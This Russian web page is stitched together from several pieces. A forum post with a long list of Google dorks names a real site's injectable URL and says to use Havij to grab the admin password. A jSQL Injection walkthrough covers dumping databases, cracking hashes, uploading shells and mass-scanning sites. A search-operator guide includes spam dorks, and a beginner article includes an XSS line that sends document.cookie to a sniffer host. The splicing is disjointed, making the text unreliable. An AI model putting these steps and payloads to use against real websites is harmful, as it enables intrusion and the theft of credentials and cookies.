Inurl php category var игры. Инструкция по использованию jSQL Injection — многофункционального инструмента поиска и эксплуатации SQL-инъекций в Kali Linux. Брутфорсинг хешей с помощью jSQL Injection

И так, сейчас я расскажу о том, как без особых знаний чего либо взломать что-то. Говорю сразу, выгоды с этого мало, но все же.
Для начала, надо найти сами сайты. Для этого идем в google.com и ищем по доркам

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid=1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

вот небольшой списочек. Можете использовать свои. И так, мы нашли сайт. Например http://www.vestitambov.ru/
Далее качаем эту программу

**Hidden Content: To see this hidden content your post count must be 3 or greater.**

Жмем ОК. Затем вставляем сайт жертву.
Жмем старт. Далее ждем результатов.
И так, программа нашла SQL уязвимость.

Далее качаем Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= вставляем полученную ссылку туда. Объяснять как пользоваться Havij и где качать не буду, найти его не трудно. Все. Вы получили нужные вам данные - пароль администратора, а дальше дело уже вашей фантазии.

П.С. Это моя первая попытка что-то написать. Извиняюсь если что не так

Запустите скаченный файл двойным кликом (нужно иметь виртуальную машину ).

3. Анонимность при проверке сайта на SQL-инъекции
Настройка Tor и Privoxy в Kali Linux

[Раздел в разработке]

Настройка Tor и Privoxy в Windows

[Раздел в разработке]

Настройки работы через прокси в jSQL Injection

[Раздел в разработке]

4. Проверка сайта на SQL-инъекции с jSQL Injection

Работа с программой крайне проста. Достаточно ввести адрес сайта и нажать ENTER.

На следующем скриншоте видно, что сайт уязвим сразу к трём видам SQL-инъекций (информация о них указана в правом нижнем углу). Кликая на названия инъекций можно переключить используемый метод:

Также нам уже выведены имеющиеся базы данных.

Можно посмотреть содержимое каждой таблицы:

Обычно, самым интересным в таблицах являются учётные данные администратора.

Если вам повезло и вы нашли данные администратора — то радоваться рано. Нужно ещё найти админку, куда эти данные вводить.

5. Поиск админок с jSQL Injection

Для этого переходите на следующую вкладку. Здесь нас встречает список возможных адресов. Можете выбрать одну или несколько страниц для проверки:

Удобство заключается в том, что не нужно использовать другие программы.

К сожалению, нерадивых программистов, которые хранят пароли в открытом виде, не очень много. Довольно часто в строке пароля мы видим что-нибудь вроде

8743b52063cd84097a65d1633f5c74f5

Это хеш. Расшифровать его можно брутфорсом. И… jSQL Injection имеет встроенный брутфорсер.

6. Брутфорсинг хешей с помощью jSQL Injection

Несомненным удобство является то, что не нужно искать другие программы. Здесь имеется поддержка множества самых популярных хешей.

Это не самый оптимальный вариант. Для того, чтобы стать гуру в расшифровке хешей, рекомендуется Книга « » на русском языке.

Но, конечно, когда под рукой нет другой программы или нет времени на изучение, jSQL Injection со встроенной функцией брут-форса придётся очень кстати.

Присутствуют настройки: можно задать какие символы входят в пароль, диапазон длины пароля.

7. Операции с файлами после обнаружения SQL-инъекций

Кроме операций с базами данных — их чтение и модификация, в случае обнаружения SQL-инъекций возможно выполнение следующих файловых операций:

  • чтение файлов на сервере
  • выгрузка новых файлов на сервер
  • выгрузка шеллов на сервер

И всё это реализовано в jSQL Injection!

Есть ограничения — у SQL-сервера должны быть файловые привилегии. У разумных системных администраторов они отключены и доступа к файловой системе получить не удастся.

Наличие файловых привилегий достаточно просто проверить. Перейдите в одну из вкладок (чтение файлов, создание шелла, закачка нового файла) и попытайтесь выполнить одну из указанных операций.

Ещё очень важное замечание — нам нужно знать точный абсолютный путь до файла с которым мы будем работать — иначе ничего не получится.

Посмотрите на следующий скриншот:

На любую попытку операции с файлом нам отвечают: No FILE privilege (нет файловых привелегий). И ничего здесь поделать нельзя.

Если вместо этого у вас другая ошибка:

Problem writing into [название_каталога]

Это означает, что вы неправильно указали абсолютный путь, в который нужно записывать файл.

Для того, чтобы предположить абсолютный путь, нужно, как минимум, знать операционную систему на которой работает сервер. Для этого переключитесь к вкладке Network.

Такая запись (строка Win64 ) даёт основание нам предположить, что мы имеем дело с ОС Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Здесь у нас какой-то из Unix (*BSD, Linux):

Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X-Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

А здесь у нас CentOS:

Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

В Windows типичной папкой для сайтов является C:\Server\data\htdocs\ . Но, на самом деле, если кто-то «додумался» делать сервер на Windows, то, весьма вероятно, этот человек ничего не слышал о привилегиях. Поэтому начинать попытки стоит прямо с каталога C:/Windows/:

Как видим, всё прошло прекрасно с первого раза.

Но вот сами шеллы jSQL Injection у меня вызывают сомнения. Если есть файловые привилегии, то вы вполне можете закачать что-нибудь с веб-интерфейсом.

8. Массовая проверка сайтов на SQL-инъекции

И даже эта функция есть у jSQL Injection. Всё предельно просто — загружаете список сайтов (можно импортировать из файла), выбираете те, которые хотите проверить и нажимаете соответствующую кнопку для начала операции.

Вывод по jSQL Injection

jSQL Injection хороший, мощный инструмент для поиска и последующего использования найденных на сайтах SQL-инъекций. Его несомненные плюсы: простота использования, встроенные сопутствующие функции. jSQL Injection может стать лучшим другом новичка при анализе веб-сайтов.

Из недостатков я бы отметил невозможность редактирования баз данных (по крайней мере я этого функционала не нашёл). Как и у всех инструментов с графическим интерфейсом, к недостаткам этой программы можно приписать невозможность использования в скриптах. Тем не менее некоторая автоматизация возможна и в этой программе — благодаря встроенной функции массовой проверки сайтов.

Программой jSQL Injection пользоваться значительно удобнее чем sqlmap . Но sqlmap поддерживает больше видов SQL-инъекций, имеет опции для работы с файловыми файерволами и некоторые другие функции.

Итог: jSQL Injection — лучший друг начинающего хакера.

Справку по данной программе в Энциклопедии Kali Linux вы найдёте на этой странице: http://kali.tools/?p=706

Как правильно искать с помощью google.com

Все наверное умеют пользоваться такой поисковой системой, как гугл =) Но не все знают, что если грамотно составить поисковой запрос с помощью специальных конструкций, то можно достичь результатов того, что Вы ищете намного эффективнее и быстрее =) В этой статье я постараюсь показать что и как Вам нужно делать, чтобы искать правильно

Гугл поддерживает несколько расширенных операторов поиска, имеющими специальное значение при поиске на google.com. Типично, эти операторы изменяют поиск, или даже говорят гуглу делать полностью различные типы поиска. Например, конструкция link: является специальным оператором, и запрос link:www.google.com не даст вам нормального поиска, но вместо этого найдет все web-страницы, которые имеют связи к google.com.
альтернативные типы запросов

cache: Если Вы будете включать другие слова в запрос, то Гугл подсветит эти включенные слова в пределах кэшируемого документа.
Например, cache:www.сайт web покажет кэшируемое содержимое с подсвеченным словом "web".

link: рассматриваемый выше поисковой запрос покажет веб-страницы, на которых содержатся ссылки к указанному запросу.
Например: link:www.сайт отобразит все страницы на которых есть ссылка на http://www.сайт

related: Отобразит web-страницы, которые являются "подобными" (related) указанной web-странице.
Например, related: www.google.com перечислит web-страницы, которые являются подобными домашней странице Гугл.

info: Информация запроса: представит немного информации, которую Гугл имеет о запрашиваемой web-странице.
Например, info:сайт покажет информацию о нашем форуме =) (Армада - Форум адалт вебмастеров).

Другие информационные запросы

define: Запрос define: обеспечит определение слов, которые Вы вводите после того, как это, собранный из различных сетевых источников. Определение будет для всей введенной фразы (то есть, это будет включать все слова в точный запрос).

stocks: Если Вы начинаете запрос с stocks: Гугл обработает остальную часть сроков запроса как символы биржевых сводок, и свяжется со страницей, показывающую готовую информацию для этих символов.
Например, stocks: Intel yahoo покажет информацию о Intel и Yahoo. (Отметьте, что Вы должны напечатать символы последних новостей, не название компании)

Модификаторы Запросов

site: Если Вы включаете site: в ваш запрос, Гугл ограничит результаты теми вебсайтами, которые найдет в данном домене.
Также можно искать и по отдельным зонам, как таковое ru, org, com, etc ( site:com site:ru )

allintitle: Если Вы запускаете запрос с allintitle:, Гугл ограничит результаты со всеми словами запроса в заголовке.
Например, allintitle: google search вернет все страницы гугла по поиску как то images, Blog, etc

intitle: Если Вы включаете intitle: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в заголовке.
Например, intitle:Бизнес

allinurl: Если Вы запускаете запрос с allinurl: Гугл ограничит результаты, со всеми словами запроса в URL.
Например, allinurl: google search вернет документы с google и search в заголовке. Также как вариант можно разделять слова слэшем (/) тогда слова по обе стороны слэша будут искаться в пределах одной страницы: Пример allinurl: foo/bar

inurl: Если Вы включаете inurl: в вашем запросе, Гугл ограничит результаты документами, содержащими то слово в URL.
Например, Animation inurl:сайт

intext: ищет только в тексте страницы указанное слово, игнорируя заглавие и тексты ссылок, и прочее не относящееся к. Есть также и производная этого модификатора - allintext: т.е. далее все слова в запросе будут искаться только в тексте, что тоже бывает важно, игнорируя часто используемые слова в ссылках
Например, intext:форум

daterange: ищет во временных рамках (daterange:2452389-2452389), даты для времени указываются в Юлианском формате.

Ну и еще всякие интересные примеры запросов

Примеры составления запросов для Google. Для спамеров

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp “Character Count”

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:”Submit New Story”

Журналы

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? “Гостевая книга”

Блоги

Inurl:blogger.com/comment.g?”postID”"anonymous”

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:”Post comment”

Inurl:pirillo.com “Post comment”

Форумы

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:”mes.php?”

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Я решил немного рассказать об информационной безопасности. Статья будет полезна начинающим программистам и тем, кто только-только начал заниматься Frontend-разработкой. В чём проблема?

Многие начинающие разработчики так увлекаются написанием кода, что совсем забывают о безопасности своих работ. И что самое главное - забывают о таких уязвимостях, как запрос SQL, XXS. А ещё придумывают лёгкие пароли для своих административных панелей и подвергаются брутфорсу. Что это за атаки и как можно их избежать?

SQL-инъекция

SQL-инъекция – это самый распространённый вид атаки на базу данных, который осуществляется при SQL-запросе для конкретной СУБД. От таких атак страдает множество людей и даже крупных компаний. Причина - ошибка разработчика при написании базы данных и, собственно говоря, SQL-запросов.

Атака типа внедрения SQL возможна из-за некорректной обработки входных данных, используемых в SQL-запросах. При удачном прохождении атаки со стороны хакера вы рискуете потерять не только содержимое баз данных, но и соответственно пароли и логи административной панели. А этих данных будет вполне достаточно, чтобы полностью завладеть сайтом или внести в него необратимые коррективы.

Атака может быть удачно воспроизведена в сценариях, написанных на PHP, ASP, Perl и других языках. Успешность таких атак больше зависит от того, какая используется СУБД и как реализован сам сценарий. В мире очень много уязвимых сайтов для SQL-инъекций. В этом легко убедиться. Достаточно ввести «дорки» - это специальные запросы по поиску уязвимых сайтов. Вот некоторые из них:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Как ими пользоваться? Достаточно ввести их в поисковик Google или Яндекс. Поисковик выдаст вам не просто уязвимый сайт, но и страницу на эту уязвимость. Но мы не будем на этом останавливаться и убедимся, что страница действительно уязвима. Для это достаточно после значения «id=1» поставить одинарную кавычку «‘». Как-то так:

  • inurl:games.php?id=1’

И сайт нам выдаст ошибку о запросе SQL. Что же нужно дальше нашему хакеру?

А дальше ему нужна это самая ссылка на страницу с ошибкой. Затем работа над уязвимостью в большинстве случаев происходит в дистрибутиве "Kali linux" с его утилитами по этой части: внедрение инъекционного кода и выполнение необходимых операций. Как это будет происходить, я вам не могу сказать. Но об этом можно найти информацию в интернете.

XSS Атака

Данный вид атаки осуществляется на файлы Cookies. Их в свою очередь очень любят сохранять пользователи. А почему нет? Как же без них? Ведь благодаря Cookies мы не вбиваем сто раз пароль от Vk.com или Mail.ru. И мало тех, кто от них отказывается. Но в интернете для хакеров часто фигурирует правило: коэффициент удобства прямо пропорционален коэффициенту небезопасности.

Для реализации XSS-атаки нашему хакеру нужно знание JavaScript. Язык на первый взгляд очень прост и безобиден, потому что не имеет доступа к ресурсам компьютера. Работать с JavaScript хакер может только в браузере, но и этого достаточно. Ведь главное ввести код в веб-страницу.

Подробно говорить о процессе атаки я не стану. Расскажу лишь основы и смысл того, как это происходит.

Хакер может добавить на какой-нибудь форум или гостевую книгу JS-код:

document.location.href =”http://192.168.1.7/sniff.php?test”

Скрипты переадресуют нас на заражённую страницу, где будет выполнятся код: будь то сниффер, какое-либо хранилище или эксплоид, который так или иначе похитит наши Cookies с кэша.

Почему именно JavaScript? Потому что JavaScript отлично ладит с веб-запросами и имеет доступ к Cookies. Но если наш скрипт будет переводить нас на какой-нибудь сайт, то пользователь это легко заметит. Здесь же хакер применяет более хитрый вариант - просто вписывает код в картинку.

Img=new Image();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Мы просто создаём изображение и приписываем ему в качестве адреса наш сценарий.

Как уберечься от всего этого? Очень просто - не переходите по подозрительным ссылкам.

DoS и DDos Атаки

DoS (от англ. Denial of Service - отказ в обслуживании) - хакерская атака на вычислительную систему с целью привести её к отказу. Это создание таких условий, при которых добросовестные пользователи системы не могут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ затруднён. Отказ системы может быть и шагом к её захвату, если во внештатной ситуации ПО выдаёт какую-либо критическую информацию: например, версию, часть программного кода и пр. Но чаще всего это мера экономического давления: потеря простой службы, приносящей доход. Счета от провайдера или меры по уходу от атаки ощутимо бьют «цель» по карману.В настоящее время DoS и DDoS-атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик.

Чем отличается DoS от DDos атаки?

DoS это атака построенная умным способом. Например, если сервер не проверяет корректность входящих пакетов, то хакер может сделать такой запрос, который будет обрабатываться вечно, а на работу с другими соединениями не хватит процессорного времени. Соответственно клиенты получат отказ в обслуживании. Но перегрузить или вывести из строя таким способом крупные известные сайты не получится. У них на вооружении стоят достаточно широкие каналы и сверхмощные серверы, которые без проблем справляются с подобной перегрузкой.

DDoS - это фактически такая же атака, как и DoS. Но если в DoS один пакет запроса, то в DDoS их очень может быть от сотни и более. Даже сверхмощные сервера могут не справиться с такой перегрузкой. Приведу пример.

DoS атака - это когда ты ведёшь разговор с кем-то, но тут подходит какой-то невоспитанный человек и начинает громко кричать. Разговаривать при этом либо невозможно, либо очень сложно. Решение: вызвать охрану, которая успокоит и выведет человека из помещения. DDoS-атаки - это когда таких невоспитанных людей вбегает многотысячная толпа. В таком случае охрана не сумеет всех скрутить и увести.

DoS и DDoS производятся с компьютеров, так называемых зомби. Это взломанные хакерами компьютеры пользователей, которые даже не подозревают, что их машина участвует в атаке какого-либо сервера.

Как уберечь себя от этого? В общем-то никак. Но можно усложнить задачу хакеру. Для этого необходимо выбрать хороший хостинг с мощными серверами.

Bruteforce атака

Разработчик может придумать очень много систем защиты от атак, полностью просмотреть написанные нами скрипты, проверить сайт на уязвимость и т.д. Но когда дойдёт до последнего шага вёрстки сайта, а именно когда будет просто ставить пароль на админку, он может забыть об одной вещи. Пароль!

Категорически не рекомендуется ставить простой пароль. Это могут быть 12345, 1114457, vasya111 и т. д. Не рекомендуется ставить пароли длиной меньше 10-11 символов. Иначе вы можете подвергнуться самой обычной и не сложной атаки - Брутфорсу.

Брутфорс - это атака перебора пароля по словарю с использованием специальных программ. Словари могут быть разные: латиница, перебор по цифрам скажем до какого-либо диапазона, смешанные (латиница +цифры), и даже бывают словари с уникальными символами @#4$%&*~~`’”\ ? и пр.

Конечно такого вида атаки легко избежать.Достаточно придумать сложный пароль. Вас может спасти даже капча. А ещё, если ваш сайт сделан на CMS, то многие из них вычисляют подобный вид атаки и блокируют ip. Надо всегда помнить, чем больше разных символов в пароле, тем тяжелее его подобрать.

Как же работают «Хакеры»? В большинстве случаев они либо подозревают, либо заранее знают часть пароля. Совсем логично предположить, что пароль пользователя уж точно не будет состоять из 3 или 5 символов. Такие пароли приводят к частым взломам. В основном хакеры берут диапазон от 5 до 10 символов и прибавляют туда несколько символов, которые возможно знают заранее. Далее генерируют пароли с нужными диапазонами. В дистрибутиве Kali linux имеются даже программы для таких случаев. И вуаля, атака уже не будет длиться долго, так как объём словаря уже не такой и большой. К тому же хакер может задействовать мощность видеокарты. Некоторые из них поддерживают систему CUDA, при этом скорость перебора увеличивается аж в 10 раз. И вот мы видим, что атака таким простым способом вполне реальна. А ведь брутфорсу подвергаются не только сайты.

Дорогие разработчики, никогда не забывайте про систему информационной безопасности, ведь сегодня от подобных видов атак страдает немало людей, в том числе и государств. Ведь самой большой уязвимостью является человек, который всегда может где-то отвлечься или где-то не доглядеть. Мы программисты, но не запрограммированные машины. Будьте всегда начеку, ведь утеря информации грозит серьёзными последствиями!

 
Статьи по теме:
Как сделать удобной работу с большим количеством вкладок в браузере
Вы сможете работать за компьютером быстрее, если оптимально расположите окна и вкладки браузера. Как быстро переключаться между окнами Нажмите и удерживайте клавишу Alt . Затем нажмите и удерживайте Tab , пока не откроется нужное окно. Как просматривать д
Установка и удаление AVG Internet Security Антивирус авг как включить компонент программы
В этом уроке мы рассмотрим, как установить бесплатный антивирус AVG. Почему именно бесплатный? Этот и другие вопросы я подробно опишу ниже! Сегодня проводить время в Интернете без защиты очень опасно, особенно новичку. Под защитой я подразумеваю антивир
Проверенные безопасные способы
С целью заработка в интернете многие пользователи запускают каналы на Ютубе. Идея хорошая, только без качественных роликов и грамотной раскрутки, никогда не получится зарабатывать большие деньги. Контент играет ключевую роль, а публикуя
Сервисы распознования капчи Автоматическое распознавание капчи
Здравствуйте, уважаемые читатели блога сайт. Антикапча (временно это был Антигейт) – это многофункциональная площадка для автоматического распознавания так называемой капчи (защиты от автоматического постинга ботами, а также защиты поисковиков от парсинг